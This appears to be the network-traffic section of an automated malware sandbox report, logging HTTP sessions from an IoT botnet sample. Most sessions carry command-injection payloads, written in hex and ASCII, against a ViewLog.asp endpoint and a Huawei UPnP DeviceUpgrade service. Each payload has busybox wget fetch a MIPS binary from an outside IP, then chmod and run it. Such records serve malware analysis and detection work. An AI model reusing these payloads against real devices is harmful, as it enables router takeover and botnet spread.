                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13192.168.2.135713662.45.212.478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:58.992378950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:59.189958096 CET471INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 05:13:13 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 207
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 68 6f 6d 65 2f 61 70 70 2f 77 65 62 73 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /home/app/webs/cgi-bin/ViewLog.asp</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14192.168.2.134127694.122.95.2378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:59.216559887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15192.168.2.134980494.120.28.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:59.223584890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16192.168.2.134440285.192.154.1578080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:59.240778923 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:59.510834932 CET90INHTTP/1.1 404 Not Found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17192.168.2.1333148156.254.85.18537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:00.961545944 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:04.998756886 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:11.142765999 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:23.174635887 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:48.774585009 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:37.926465034 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192.168.2.135394285.184.175.1418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.698281050 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:01.881938934 CET459INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:15:01 GMT
                                              Content-Type: text/html
                                              Content-Length: 248
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192.168.2.135964862.194.98.1858080
                                              TimestampBytes transferredDirectionData
